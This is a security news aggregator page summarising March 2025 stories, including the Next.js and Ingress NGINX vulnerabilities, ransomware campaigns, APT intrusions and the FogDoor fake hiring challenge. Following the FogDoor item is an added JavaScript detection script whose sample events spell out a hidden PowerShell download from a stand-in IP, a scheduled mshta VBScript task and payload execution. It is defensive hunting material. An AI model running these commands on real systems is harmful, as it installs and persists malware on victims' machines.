Security News
The latest cybersecurity news, collected from a wide range of security websites.
2025-03-25 00:25:00
Critical Ingress NGINX Controller Vulnerability Allows RCE Without Authentication
A set of five critical security shortcomings has been disclosed in the Ingress NGINX Controller for Kubernetes that could result in unauthenticated remote code execution, putting over 6,500 clusters at immediate risk by exposing the component to the public internet. The vulnerabilities (CVE-2025-24513, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098, and CVE-2025-1974), assigned a CVSS score of
by The Hacker News
2025-03-24 21:49:00
Microsoft Adds Inline Data Protection to Edge for Business to Block GenAI Data Leaks
Microsoft on Monday announced a new feature called inline data protection for its enterprise-focused Edge for Business web browser. The native data security control is designed to prevent employees from sharing sensitive company-related data into consumer generative artificial intelligence (GenAI) apps like OpenAI ChatGPT, Google Gemini, and DeepSeek. The list will be expanded over time to
by The Hacker News
2025-03-24 21:33:50
CloudSEK Disputes Oracle Over Data Breach Denial with New Evidence
Oracle is caught up in a cybersecurity mess right now, with claims about a massive data breach affecting…
by Hackread
2025-03-24 21:14:13
The Trump administration planned Yemen strikes in an unauthorized Signal chat
The Trump administration’s national security leaders accidentally included the editor-in-chief of the Atlantic, Jeffrey Goldberg, in a chat on Signal discussing confidential plans to attack Yemen’s Houthis. “I could not believe that the national-security leadership of the United States would communicate on Signal about imminent war plans,” Goldberg wrote of the March 15 messages, which […]
by TechCrunch
2025-03-24 20:52:29
Chinese hackers spent four years inside Asian telco’s networks
The hackers compromised home routers made by Zyxel to gain entry into a “major” telecommunications company's environment.
by The Record
2025-03-24 20:51:59
How to Delete Your Data From 23andMe
DNA-testing company 23andMe has filed for bankruptcy, which means the future of the company’s vast trove of customer data is unknown. Here’s what that means for your genetic data.
by WIRED Security News
2025-03-24 20:37:00
Got a suspicious E-ZPass text? Don't click the link (and what to do if you already did)
E-ZPass phishing texts have hit many thousands of people over the last few months - even non-drivers. Here's what to do if you receive one.
by ZDNET Security
2025-03-24 20:36:35
Chinese APT Weaver Ant infiltrated a telco in Asia for over four years
The China-linked threat actor Weaver Ant infiltrated the network of a telecommunications services provider in Asia for over four years. During a forensic investigation, Sygnia researchers observed multiple alerts revealing a threat-actor account that had been re-enabled by a service account […]
by Security Affairs
2025-03-24 20:28:47
5 Unexpected Devices You Didn’t Know Could Spread Malware
When you think of malware, your mind probably jumps to malicious downloads or email attachments. But it turns…
by Hackread
2025-03-24 20:17:03
Chinese Hacker Group Tracked Back to iSoon APT Operation
The group, called FishMonger or Aquatic Panda, is working under contract for the Chinese government to steal data from governmental organizations, Catholic charities, NGOs, think tanks, and more.
by Dark Reading
2025-03-24 19:56:06
Fake Hiring Challenge for Developers Steals Sensitive Data
Cyble threat intelligence researchers have uncovered a GitHub repository masquerading as a hiring coding challenge that tricks developers into downloading a backdoor to steal sensitive data. The campaign uses a number of unusual techniques, such as using a social media profile for command and control (C&C) activities instead of C&C servers. There is evidence that the campaign may be expanding beyond a fake hiring challenge for developers, as Cyble Research and Intelligence Labs (CRIL) researchers also found invoice-themed lures.

Fake Hiring Challenge Targets Polish Developers
The Cyble researchers said in a blog post that the campaign appears to target Polish-speaking developers, and the malware uses geofencing to restrict execution. The researchers speculated that the campaign is delivered via job platforms like LinkedIn or regional developer forums. The fake recruitment test, named “FizzBuzz,” is used to trick victims into downloading an ISO file containing a JavaScript exercise and a malicious LNK shortcut. When executed, the LNK file (“README.lnk”) runs a PowerShell script that installs a stealthy backdoor dubbed “FogDoor” by the researchers. “This backdoor is designed for persistence, data theft, and remote command execution while avoiding detection,” Cyble wrote. Instead of using C&C servers, FogDoor communicates with a social media platform via a Dead Drop Resolver (DDR) technique, retrieving attack commands from a social media profile, the researchers said. The malware uses geofencing to restrict execution to Polish victims. Once active, “it systematically steals browser cookies, Wi-Fi credentials, and system data, staging them for exfiltration before deleting traces,” Cyble said. The malware uses remote debugging to steal Chrome cookies and can operate in background mode, while Firefox credentials are taken from profile directories.

PowerShell Script Establishes Persistence
The PowerShell script also opens a “README.txt” file “to mislead users into believing they are interacting with a harmless file,” Cyble said. That document contains instructions for a code bug fix task, “making it appear harmless while ensuring the PowerShell script executes only once on the victim’s machine to carry out malicious activities.” The PowerShell script also downloads an executable file and saves it as “SkyWatchWeather.exe” in the “C:\Users\Public\Downloads” folder and creates a scheduled task named “Weather Widget,” which executes the downloaded file using mshta.exe and VBScript and is set to run every two minutes indefinitely. SkyWatchWeather.exe acts as a backdoor by using a social media platform (bark.lgbt) and a temporary webhook service (webhookbin.net) as its C&C infrastructure. After verifying location, the malware attempts to establish a connection with “bark.lgbt/api” to await further commands, which are embedded within the profile information of a social media platform. That setup also makes detection and takedown efforts more challenging, Cyble said.

Stopping Hiring Scams and Cyberattacks
The researchers had a number of recommendations for protecting against FizzBuzz, FogDoor and similar attacks, such as:
- Cross-checking job offers and coding challenges from unverified sources
- Refraining from downloading and running files from unknown repositories, particularly ISO images and script files
- Restricting the execution of PowerShell, JavaScript and other scripting languages unless explicitly required, and using application whitelisting
- Monitoring outbound connections to uncommon domains or file-sharing services
- Protecting browser-stored credentials with multi-factor authentication (MFA) and password managers.
The full Cyble blog contains deeper analysis of the campaign and includes Yara and Sigma detection rules, indicators of compromise (IoCs) and MITRE ATT&CK techniques.
by The Cyber Express
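The persistence and staging chain Cyble describes above (PowerShell dropping SkyWatchWeather.exe into C:\Users\Public\Downloads, a scheduled task firing every two minutes, mshta.exe running inline VBScript) maps directly onto an endpoint hunt. The following is an added example written for this page; it is not Cyble's code or its Sigma rules. It scores Sysmon-style process-creation events, whose field names (host, time, image, parentImage, commandLine) and sample records are constructed here, and reports any host on which two or more steps of the chain fire within a short window. Two heuristics are assumptions: that the task runs under the Task Scheduler service host (so mshta.exe's parent is svchost.exe), and the exact schtasks command line, which is one plausible rendering of the task the article describes.

```javascript
'use strict';
// Added hunting example for the FogDoor chain described above; not Cyble's code.
// Event schema (host, time, image, parentImage, commandLine) and every sample
// record below are constructed for this example.

const PUBLIC_DOWNLOADS = /c:\\users\\public\\downloads\\/i;

// One rule per step of the chain; test() returns true when the event matches.
const RULES = [
  { // PowerShell writing into the world-writable Public Downloads folder
    id: 'powershell-stages-public-downloads',
    test: e => /\\powershell\.exe$/i.test(e.image) && PUBLIC_DOWNLOADS.test(e.commandLine) },
  { // schtasks creating a task that repeats every <= 5 minutes and launches mshta
    id: 'schtasks-minute-interval-mshta',
    test: e => {
      if (!/\\schtasks\.exe$/i.test(e.image)) return false;
      const m = /\/sc\s+minute\s+\/mo\s+(\d+)/i.exec(e.commandLine);
      return m !== null && Number(m[1]) <= 5 && /mshta/i.test(e.commandLine);
    } },
  { // mshta.exe started by the Task Scheduler host (assumed parent) with inline VBScript
    id: 'mshta-vbscript-from-scheduler',
    test: e => /\\mshta\.exe$/i.test(e.image) && /\\svchost\.exe$/i.test(e.parentImage) &&
               /vbscript:/i.test(e.commandLine) },
  { // anything executing out of Public Downloads
    id: 'execution-from-public-downloads',
    test: e => PUBLIC_DOWNLOADS.test(e.image) },
];

function matchEvent(event) {
  return RULES.filter(r => r.test(event)).map(r => r.id);
}

// Returns every single-rule hit plus, per host, the largest set of distinct rules
// that fired within windowMs of each other (two or more = likely persistence chain).
function scanEvents(events, windowMs = 10 * 60 * 1000) {
  const hits = [];
  for (const e of events) {
    for (const rule of matchEvent(e)) {
      hits.push({ host: e.host, time: Date.parse(e.time), rule, image: e.image });
    }
  }
  const byHost = new Map();
  for (const h of hits) {
    if (!byHost.has(h.host)) byHost.set(h.host, []);
    byHost.get(h.host).push(h);
  }
  const chains = [];
  for (const [host, hostHits] of byHost) {
    hostHits.sort((a, b) => a.time - b.time);
    let best = new Set();
    for (let i = 0; i < hostHits.length; i++) {
      const rules = new Set();
      for (let j = i; j < hostHits.length && hostHits[j].time - hostHits[i].time <= windowMs; j++) {
        rules.add(hostHits[j].rule);
      }
      if (rules.size > best.size) best = rules;
    }
    if (best.size >= 2) chains.push({ host, rules: [...best].sort() });
  }
  return { hits, chains };
}

// Constructed sample: one infected developer host, one host doing benign admin work.
const PS = String.raw`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`;
const SAMPLE_EVENTS = [
  { host: 'DEV-PL-01', time: '2025-03-20T09:01:10Z', image: PS, parentImage: String.raw`C:\Windows\explorer.exe`,
    commandLine: String.raw`powershell.exe -w hidden -ep bypass -c "iwr http://203.0.113.10/w -OutFile C:\Users\Public\Downloads\SkyWatchWeather.exe"` },
  { host: 'DEV-PL-01', time: '2025-03-20T09:01:12Z', image: String.raw`C:\Windows\System32\schtasks.exe`, parentImage: PS,
    commandLine: String.raw`schtasks.exe /create /f /tn "Weather Widget" /sc minute /mo 2 /tr "mshta.exe vbscript:Execute(\"CreateObject(\"\"WScript.Shell\"\").Run \"\"C:\Users\Public\Downloads\SkyWatchWeather.exe\"\",0:close\")"` },
  { host: 'DEV-PL-01', time: '2025-03-20T09:03:00Z', image: String.raw`C:\Windows\System32\mshta.exe`, parentImage: String.raw`C:\Windows\System32\svchost.exe`,
    commandLine: String.raw`mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run ""C:\Users\Public\Downloads\SkyWatchWeather.exe"",0:close")` },
  { host: 'DEV-PL-01', time: '2025-03-20T09:03:01Z', image: String.raw`C:\Users\Public\Downloads\SkyWatchWeather.exe`, parentImage: String.raw`C:\Windows\System32\mshta.exe`,
    commandLine: 'SkyWatchWeather.exe' },
  { host: 'ADMIN-02', time: '2025-03-20T09:05:00Z', image: String.raw`C:\Windows\System32\schtasks.exe`, parentImage: String.raw`C:\Windows\System32\cmd.exe`,
    commandLine: String.raw`schtasks.exe /create /tn "Nightly Backup" /sc daily /st 02:00 /tr "C:\Tools\backup.cmd"` },
  { host: 'ADMIN-02', time: '2025-03-20T09:06:00Z', image: PS, parentImage: String.raw`C:\Windows\System32\cmd.exe`,
    commandLine: 'powershell.exe -c "Get-Service | Where-Object Status -eq Stopped"' },
];

console.log(JSON.stringify(scanEvents(SAMPLE_EVENTS).chains, null, 2));
```

Run it with `node fogdoor_hunt.js`; only DEV-PL-01 is reported, with all four rules, while the nightly backup task and the service query on ADMIN-02 produce no hits. In a real deployment the same four rules translate one-to-one into Sigma or an EDR query, and the correlation step is what keeps a single schtasks invocation from paging anyone.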
2025-03-24 19:40:32
CVE-2025-29927: Next.js Middleware Bypass Vulnerability Explained
On March 21st, 2025, Vercel disclosed a critical vulnerability affecting Next.js middleware [1]. CVE-2025-29927 is an authorization bypass vulnerability that impacts the framework's middleware system, which is often used by developers to enforce authentication, authorization, path rewriting, server-side redirects, and security-related headers like Content Security Policy (CSP). Given the popularity of Next.js, with millions of downloads weekly, the vulnerability may have a severe impact on services that use vulnerable versions of Next.js.
by Picus Security
2025-03-24 19:37:44
Microsoft's new AI agents aim to help security pros combat the latest threats
Designed for Microsoft's Security Copilot tool, the AI-powered agents will automate basic tasks, freeing IT and security staff to tackle more complex issues.
by ZDNET Security
2025-03-24 19:36:04
FBI Warns of Document Converter Tools Due to Uptick in Scams
The FBI's Denver field office says the tools will convert documents while also dropping malware and scraping users' systems for sensitive data.
by Dark Reading
2025-03-24 19:36:00
VanHelsing RaaS Launch: 3 Victims, $5K Entry Fee, Multi-OS, and Double Extortion Tactics
A ransomware-as-a-service (RaaS) operation called VanHelsing has already claimed three victims since it launched on March 7, 2025. "The RaaS model allows a wide range of participants, from experienced hackers to newcomers, to get involved with a $5,000 deposit. Affiliates keep 80% of the ransom payments, while the core operators earn 20%," Check Point said in a report published over the weekend
by The Hacker News
2025-03-24 19:34:27
Thai officers intercept Starlink transmitters allegedly headed for Myanmar scam centers
Thai law enforcement on Saturday reportedly confiscated 38 Starlink satellite internet transmitters allegedly intended to be used in scam compounds in Myanmar.
by The Record
2025-03-24 19:33:41
Next.js Vulnerability: What You Need to Know
Get details on this recent vulnerability, how to respond, and how Legit can help.
by Legit Security
2025-03-24 19:13:05
How to delete your 23andMe data and why you should do it now
With the genetic testing site filing for bankruptcy protection, you'll definitely want to delete your account and have any stored samples destroyed.
by ZDNET Security
2025-03-24 19:11:19
How attackers outsmart MFA in 2025
Exposing MFA’s weaknesses in an era of advanced threats.
by SC Media
2025-03-24 19:10:05
Critical 'IngressNightmare' Vulns Imperil Kubernetes Environments
More than 40% of all Internet-facing container orchestration clusters are at risk.
by Dark Reading
2025-03-24 19:06:58
The Human Element: Addressing Cybersecurity Risk in Danish and Swedish Organizations
We recently conducted research in Denmark and Sweden to better understand security culture in local organizations.
by KnowBe4
2025-03-24 19:05:34
Act Now: Phishing-as-a-Service Attacks are on the Rise
Phishing-as-a-service (PhaaS) platforms drove a surge in phishing attacks in the first two months of 2025, according to researchers at Barracuda.
by KnowBe4
2025-03-24 18:39:51
US lifts sanctions on Tornado Cash, a crypto mixer linked to North Korean money laundering
Tornado Cash was used to launder billions in stolen crypto, according to the Treasury.
by TechCrunch
2025-03-24 18:34:06
Hackers steal sensitive data from Pennsylvania county during ransomware attack
The government of Union County in central Pennsylvania said a recent ransomware attack exposed information related to law enforcement and other government business.
by The Record
2025-03-24 18:16:34
China-Nexus APT 'Weaver Ant' Caught in Yearslong Web Shell Attack
The persistent threat actor was caught using sophisticated Web shell techniques against an unnamed telecommunications company in Asia.
by Dark Reading
2025-03-24 18:10:05
How to Enter the US With Your Digital Privacy Intact
Crossing into the United States has become increasingly dangerous for digital privacy. Here are a few steps you can take to minimize the risk of Customs and Border Protection accessing your data.
by WIRED Security News
2025-03-24 17:56:59
AI bots scraping your data? This free tool gives those pesky crawlers the run-around
Cloudflare's AI Labyrinth has a message for bots: Get lost. Here's how to toggle on the tool.
by ZDNET Security
2025-03-24 17:43:11
New Phishing Campaign Targets macOS Users with Fake Security Alerts
LayerX Labs reports a sophisticated macOS phishing campaign, evading security measures. Learn how attackers adapt and steal credentials from Mac users.
by Hackread
2025-03-24 17:33:42
Semiconductors Giant Tokyo Electron U.S. Suffers Data Breach
Tokyo Electron U.S. Holdings, Inc., the American arm of Japanese semiconductor equipment giant Tokyo Electron Limited (TEL), has disclosed a cyber incident involving unauthorized access to internal systems and the exfiltration of employee business email credentials. While the scope of the breach appears limited, the incident underscores persistent risks even among top-tier global tech firms. …
by Cyber Insider
2025-03-24 17:29:22
AbyssWorker: stealth cryptojacking targeting cloud and containers
Elastic has discovered AbyssWorker, a fileless malware designed to mine cryptocurrency in cloud-based and containerized Linux environments. It leverages shell scripts, LOLBins, and compromised tokens to install itself without leaving traces on disk. Its infrastructure bears similarities to known Chinese cybercriminal groups. Expert Analysis: AbyssWorker is not just a “basic” cryptojacker: it targets modern, poorly protected […]
by Zendata
2025-03-24 17:28:33
Cyber Guardians: INE Security Champions Cybersecurity Training During National Physicians Week 2025
Cary, NC, 24th March 2025, CyberNewsWire
by Hackread
2025-03-24 17:24:31
Using Starlink Wi-Fi in the White House Is a Slippery Slope for US Federal IT
The ad hoc addition to the otherwise tightly controlled White House information environment could create blind spots and security exposures while setting potentially dangerous precedent.
by WIRED Security News
2025-03-24 17:23:02
Over 300 arrested in international crackdown on cyber scams
Law enforcement agencies in seven African countries arrested over 300 suspected cybercriminals involved in mobile banking, investment and messaging app scams, according to a statement on Monday by Interpol.
by The Record
2025-03-24 17:05:00
⚡ THN Weekly Recap: GitHub Supply Chain Attack, AI Malware, BYOVD Tactics, and More
A quiet tweak in a popular open-source tool opened the door to a supply chain breach—what started as a targeted attack quickly spiraled, exposing secrets across countless projects. That wasn’t the only stealth move. A new all-in-one malware is silently stealing passwords, crypto, and control—while hiding in plain sight. And over 300 Android apps joined the chaos, running ad fraud at scale behind
by The Hacker News
2025-03-24 17:00:00
Google picks up a Wiz kid, GitHub’s malicious actions, Agentic AI is sus - ESW #399
by SC Media
2025-03-24 16:48:38
Podcast: Isabelle Meyer, Cybersecurity, AI, and the Future of Digital Protection
In this episode, Isabelle Meyer, Co-CEO of ZENDATA Cybersecurity, reflects on her career path, from her early days as Head of Litigation in London to becoming a Managing Partner in Geneva and co-founding ZENDATA. With extensive experience in cybersecurity and international business development, she shares her perspective on the evolving challenges in digital security. One […]
by Zendata
2025-03-24 16:41:38
US Weakens Disinformation Defenses, as Russia & China Ramp Up
Russia and China spend billions of dollars on state media, propaganda, and disinformation, while the Trump administration has slashed funding for US agencies.
by Dark Reading
2025-03-24 16:40:00
VSCode Marketplace Removes Two Extensions Deploying Early-Stage Ransomware
Cybersecurity researchers have uncovered two malicious extensions in the Visual Studio Code (VSCode) Marketplace that are designed to deploy ransomware that's under development to its users. The extensions, named "ahban.shiba" and "ahban.cychelloworld," have since been taken down by the marketplace maintainers. Both the extensions, per ReversingLabs, incorporate code that's designed to invoke a
by The Hacker News
2025-03-24 16:32:31
Did your Google Maps Timeline disappear? Here's the fix to get yours back
Google has admitted a technical issue caused timeline data to vanish. But you might be able to get yours back. Here's how.
by ZDNET Security
2025-03-24 16:30:00
How to Balance Password Security Against User Experience
If given the choice, most users are likely to favor a seamless experience over complex security measures, as they don’t prioritize strong password security. However, balancing security and usability doesn’t have to be a zero-sum game. By implementing the right best practices and tools, you can strike a balance between robust password security and a frictionless user experience (UX). This article
by The Hacker News
2025-03-24 16:21:22
23andMe files for bankruptcy, customers advised to delete DNA data
California-based genetic testing provider 23andMe has filed for Chapter 11 bankruptcy and plans to sell its assets following years of financial struggles. [...]
by BleepingComputer
2025-03-24 16:15:49
23andMe files for bankruptcy, putting customers’ genetic data at risk
The company's Chapter 11 announcement is alarming regulators and privacy advocates who are warning customers to delete the genetic information retained by 23andMe.
by The Record
2025-03-24 16:15:34
Industry Moves for the week of March 24, 2025 - SecurityWeek
Explore industry moves and significant changes in the industry for the week of March 24, 2025. Stay updated with the latest industry trends and shifts.
by SecurityWeek
2025-03-24 16:15:29
NIST Still Struggling to Clear Vulnerability Submissions Backlog in NVD
The effects of the backlog are already being felt in vulnerability management circles, where NVD data promises an enriched source of truth.
by SecurityWeek
2025-03-24 16:00:36
Protecting your personal information from data brokers
How aware are you that your personal information could be bought and sold without your consent—and that there are companies whose entire business model revolves around this? So, these companies, called data brokers, collect everything they can about you – where you shop, what you search online, even stuff from public records – and then sell it to other companies, mostly for ads. The real problem lies in the lack of transparency since most people …
by Help Net Security
2025-03-24 16:00:33
A maintainer’s guide to vulnerability disclosure: GitHub tools to make it simple
A step-by-step guide for open source maintainers on how to handle vulnerability reports confidently from the start.
by The GitHub Blog
2025-03-24 15:51:02
Oracle Denies Cloud Breach After Hacker Offers to Sell Data
Oracle has denied that its cloud systems have been breached after a hacker claimed to have stolen millions of records.
by SecurityWeek
2025-03-24 15:43:53
New VanHelsing ransomware targets Windows, ARM, ESXi systems
A new multi-platform ransomware-as-a-service (RaaS) operation named VanHelsing has emerged, targeting Windows, Linux, BSD, ARM, and ESXi systems. [...]
by BleepingComputer
2025-03-24 15:36:33
FCC Investigates China-Backed Tech Suppliers for Evading US Operations Ban
FCC chair warns these companies may still be operating in the US because they don't believe that being added to its "Covered List" poses any serious risk.
by Dark Reading
2025-03-24 15:35:37
Cyberattack disrupts train ticket sales in Ukraine
Ukrzaliznytsia, Ukraine’s state-owned railway operator, has been hit by a cyberattack that disrupted online ticket sales.
by TechCrunch
2025-03-24 15:00:00
How to Test Adversary-in-the-Middle Without Hacking Tools
In this video, Michael Allen discusses how to test Adversary-in-the-Middle attacks without using hacking tools. He delves into the intricacies of credential harvesting, the evolution of multi-factor authentication (MFA), and how attackers adapt their strategies to bypass security measures.
by Black Hills Information Security
2025-03-24 15:00:00
Russian Firm Offers $4 Million for Telegram Exploits
A Russian exploit acquisition firm is offering up to $4 million for a full-chain exploit targeting messaging service Telegram.
by SecurityWeek
2025-03-24 14:56:19
Medusa ransomware uses malicious Windows driver ABYSSWORKER to disable security tools
Medusa ransomware uses a malicious Windows driver, ABYSSWORKER, to disable security tools, making detection and mitigation more difficult. Elastic Security Labs tracked a financially motivated MEDUSA ransomware campaign using a HEARTCRYPT-packed loader and a driver signed with a revoked certificate, ABYSSWORKER, to disable EDR tools. The attackers used a 64-bit Windows PE driver named smuol.sys, disguised as a […]
by Security Affairs
2025-03-24 14:51:58
Darktrace's Detection of State-Linked ShadowPad Malware
In 2024, Darktrace identified a cluster of intrusions involving the state-linked malware ShadowPad. This blog will detail ShadowPad and the associated activities detected by Darktrace.
by Darktrace
2025-03-24 14:47:00
Critical Next.js Vulnerability Allows Attackers to Bypass Middleware Authorization Checks
A critical security flaw has been disclosed in the Next.js React framework that could be potentially exploited to bypass authorization checks under certain conditions. The vulnerability, tracked as CVE-2025-29927, carries a CVSS score of 9.1 out of 10.0. "Next.js uses an internal header x-middleware-subrequest to prevent recursive requests from triggering infinite loops," Next.js said in an
by The Hacker News
2025-03-24 14:43:57
SUSECON '25: Expanding Open Source in Cloud, Edge, and AI
At SUSECon '25, SUSE unveiled a rebranded portfolio emphasizing Linux support, cloud-native workloads, edge computing, and AI.
by ITPro Today
2025-03-24 14:25:09
Cyberattack takes down Ukrainian state railway’s online services
Ukrzaliznytsia, Ukraine's national railway operator, has been hit by a massive cyberattack that disrupted online services for buying tickets both through mobile apps and the website. [...]
by BleepingComputer
2025-03-24 14:21:16
The Ultimate Guide to Price Manipulation Vulnerabilities: Techniques, Case Studies & Advanced…
Disclaimer: This document is for educational purposes only. Exploiting systems without authorization is illegal and punishable by law.
by InfoSec Write-ups
2025-03-24 14:20:38
SSRF Advanced Methodology✨
by InfoSec Write-ups
2025-03-24 14:19:28
Medusa ransomware deployed via malicious Windows driver
Driver with expired certificate evades EDR controls and deploys Medusa ransomware.
by SC Media
2025-03-24 14:15:05
DrayTek routers worldwide go into reboot loops over weekend
Many Internet service providers (ISPs) worldwide are alerting customers of an outage that started Saturday night and triggered DrayTek router connectivity problems. [...]
by BleepingComputer
2025-03-24 14:02:00
🐝 Hive Five 216 - The Hacker Always Wins
Online Fact-Checking Industry, Programming, AI, ADHD, Productivity, Addiction, and God.
by Hive Five
2025-03-24 14:00:06
Report: Fortune 500 employee-linked account exposure
A backbone of our economy, Fortune 500 companies employ more than 31 million people worldwide. According to data analyzed by the Enzoic research team, over the three years 2022, 2023, and 2024, more than three million employee-linked accounts became newly compromised by cybercriminals.
- 1 in 10 Fortune 500 employees had their credentials exposed in recent years
- 5.7 exposures on average per compromised account
These leaked credentials pose significant risks, enabling account takeover (ATO), spear …
by Help Net Security
2025-03-24 13:55:11
Stopping Deepfakes in Financial Services Will Require New Processes: Cyble
The rise of AI-generated deepfakes has placed the financial services industry and its customers at the epicenter of this growing cyber threat. Whether deepfake fraud is hitting consumers, commercial accounts, or financial institutions themselves, organizations in the banking and financial services sector will need new processes and cybersecurity controls to address this new generation of financial fraud and scams. A new Cyble report – Addressing Deepfake Risks in BFSI – looks at a wide range of financial deepfake threats and offers a comprehensive vision for structuring financial services cyber defenses against these new threats. Here are some of the report's findings. It is available as a free download along with other Cyble research reports.

Even Financial Employees Get Fooled by Deepfakes
These new deepfake threats are becoming so realistic that they’re fooling even financial professionals in some cases. In one alarming incident, a financial employee at a renowned design and engineering firm was duped into attending a video call with people he believed were the company’s chief financial officer (CFO) and other coworkers, yet all of them turned out to be deepfake impersonations. While the worker initially suspected phishing, the video call was so convincing that he wound up sending more than $25 million over 15 transactions. That type of scam has now become part of the standard playbook for cybercriminals, and video and voice fakes will only become more convincing as GenAI tools continue to evolve.

Defending Against Financial Services Deepfakes
Cyble offered strategies for defending against deepfake scams, including ways to detect fraudulent account applications and activity. Financial services firms have long been a prime target for cyberattacks and fraud compared to other sectors, which has resulted in some of the most substantial cybersecurity controls of any sector, public or private. That gives Banking, Financial Services, and Insurance (BFSI) organizations a good start on the controls needed for the new era of AI and deepfake threats. To protect against such threats, Cyble recommends a range of controls for both processes and cybersecurity, some of which include:
- There could be multiple levels of approval for transactions above a certain amount, which could vary based on the size of the customer involved.
- Codewords may need to become a new requirement for sensitive financial communications.
- Device and account controls for financial transactions and privileged accounts should be as stringent as possible and go well beyond one-time passwords (OTP) to include additional factors such as biometrics, device security posture, and the use of additional accounts and devices for verification.
- Email filtering for spam and phishing attacks is another essential practice, as large language models (LLMs) have made phishing attacks significantly more effective.
- Monitoring customer accounts for potentially fraudulent activity and anomalous transactions has become more critical than ever. Because most credential theft occurs via infostealer malware, stolen credentials may appear on the dark web before attempts to hack an account occur, making leaked credentials an important early warning sign. Therefore, dark web monitoring for both company and customer credential theft could increasingly become a core practice by financial services companies – and make cybersecurity in general a competitive differentiator for BFSI organizations.
- Deepfake detection and takedown services have also become a critical cyber defense. Cyble notes that “Ideally, it will become ubiquitous even in consumer devices in the years ahead, as present spam controls are inadequate protection for this new era of threats.”
- Employee and customer education and training are also critically important defenses, and deepfake audio and video attack simulations must become part of security awareness and training programs.

Conclusion
Today’s cybercriminals are working with AI-powered tools that were inconceivable just a few short years ago. Those tools are creating deepfakes and AI-generated threats that have already met with considerable success. Financial organizations must respond with urgency to stay on top of these growing threats. New financial processes and cybersecurity controls are just some of the measures that will be required to shore up defenses against deepfake threats. Cyble offers a Deepfake Detection Tool integrated within its Executive Monitoring Module. The tool utilizes advanced AI algorithms to detect and analyze manipulated media, such as videos and audio files, in real-time, safeguarding executives and organizations from deepfake threats. In addition to deepfake detection, Cyble’s Executive Monitoring module offers comprehensive protection for high-profile executives by detecting and alerting on digital threats such as identity theft, public mentions, data breaches, and compromised credentials. Cyble’s Dark Web Monitoring solution is another way for financial organizations to stay on top of threats, including leaked internal and customer account credentials. Cyble also offers a comprehensive suite of threat intelligence, cloud security, and attack surface management platforms.
by CYBLE
2025-03-24 13:53:27
Chinese Weaver Ant hackers spied on telco network for 4 years
A China-linked advanced threat group named Weaver Ant spent more than four years in the network of a telecommunications services provider, hiding traffic and infrastructure with the help of compromised Zyxel CPE routers. [...]
by BleepingComputer
2025-03-24 13:50:31
New VanHelsing ransomware demands $500,000 ransom payments
A new ransomware-as-a-service (RaaS) offering dubbed VanHelsingRaaS has surfaced, rapidly gaining traction within cybercriminal circles since its launch earlier this month. Within just two weeks, it has already claimed at least three victims, demanding up to $500,000 in Bitcoin and showcasing cross-platform capabilities that mark a significant evolution in the RaaS threat landscape. Check Point …
by Cyber Insider
2025-03-24 13:43:59
Webinar Tomorrow: Which Security Testing Approach is Right for You?
Understand whether BAS, Automated Penetration Testing, or the combined approach of Adversarial Exposure Validation (AEV) aligns best with your organization’s unique security needs.
by SecurityWeek
2025-03-24 13:34:59
What CISA's Red Team Disarray Means for US Cyber Defenses
DOGE is making wild moves at CISA, including bringing back fired probationary employees only to put them on paid leave, and reportedly gutting the agency's red teams.
by ITPro Today
2025-03-24 13:31:02
NYU Website Hack Leads to the Exposure of 3 Million Applicants’ Data
A hacker hijacked New York University’s (NYU) website on Saturday morning, leaking highly sensitive admissions data for more than 3 million applicants spanning over three decades. The breach, which lasted approximately two hours, also included accusations that NYU has continued to factor race into its admissions decisions despite the U.S. Supreme Court’s 2023 ban on …
by Cyber Insider
2025-03-24 13:07:47
Critical Next.js auth bypass vulnerability opens web apps to compromise (CVE-2025-29927)A critical vulnerability (CVE-2025-29927) in the open source Next.js framework can be exploited by attackers to bypass authorization checks and gain unauthorized access to web pages they should not have access to (e.g., the web app’s admin panel). Vercel – the cloud platform-as-a-service company that develops the popular framework – has released security updates fixing it, and has advised users to upgrade as soon as possible. What is Next.js and how does CVE-2025-29927 manifest? Next.js …
by Help Net Security
2025-03-24 13:05:00
Security Week 2025: in reviewSecurity Week 2025 has officially come to a close. Our updates for the week included a deep dive on our AI offering, a unified navigation experience, and an introduction to our AI Agent Cloudy.
by Cloudflare
2025-03-24 13:00:00
New URLPattern API brings improved pattern matching to Node.js and Cloudflare WorkersToday we're announcing our latest contribution to Node.js, now available in v23.8.0: URLPattern.
by Cloudflare
2025-03-24 13:00:00
Why Principle of Least Privilege Matters More Than Ever in a World of Backdoored Large Language Models (LLMs)The concept of “principle of least privilege” has been around for a long time. In fact, it is older than me; there are papers from the 70s that discuss it:
by SpiderLabs Blog
2025-03-24 12:40:01
US Lifts Sanctions Against Crypto Mixer Tornado CashThe US Department of the Treasury has removed sanctions against the fully decentralized cryptocurrency mixer service Tornado Cash.
by SecurityWeek
2025-03-24 12:30:08
Despite Rip-and-Replace Efforts, FCC Suspects Banned Chinese Telecom Providers Still Active in USThe FCC is investigating whether Chinese firms such as Huawei, ZTE and China Telecom are still operating in the US.
by SecurityWeek
2025-03-24 12:17:45
Police arrests 300 suspects linked to African cybercrime ringsAfrican law enforcement authorities have arrested 306 suspects as part of 'Operation Red Card,' an INTERPOL-led international crackdown targeting cross-border cybercriminal networks. [...]
by BleepingComputer
2025-03-24 12:15:32
Critical flaw in Next.js lets hackers bypass authorizationA critical severity vulnerability has been discovered in the Next.js open-source web development framework, potentially allowing attackers to bypass authorization checks. [...]
by BleepingComputer
2025-03-24 12:15:00
23andMe faces an uncertain future — so does your genetic dataAs 23andMe's bankruptcy looms, privacy experts warn customers to delete their DNA data.
by TechCrunch
2025-03-24 12:12:13
24th March – Threat Intelligence ReportFor the latest discoveries in cyber research for the week of 24th March, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Municipalities in four US states experienced cyberattacks that disrupted services for county offices, courts, and schools. Cleveland Municipal Court was hit by a Qilin ransomware attack, forcing employees offline and delaying trials, while […]
by Check Point Research
2025-03-24 12:03:10
Transforming Data Access in the Energy Sector Through Modern Edge ComputingAs the energy sector faces rising AI adoption, cyber threats, and unpredictable disruptions, real-time data access is more critical than ever: Edge computing is emerging as a key solution.
by ITPro Today
2025-03-24 12:00:00
Rust for Malware DevelopmentIn this blog, Bishop Fox's Nick Cerne compares malware development in Rust with its C counterparts and builds a simple malware dropper for demonstration.
by Bishop Fox
2025-03-24 11:47:00
FCC investigating China-linked companies over evasion of U.S. national security measuresThe agency is cracking down on the use of prohibited technologies following a series of hacks into U.S. telecommunications firms.
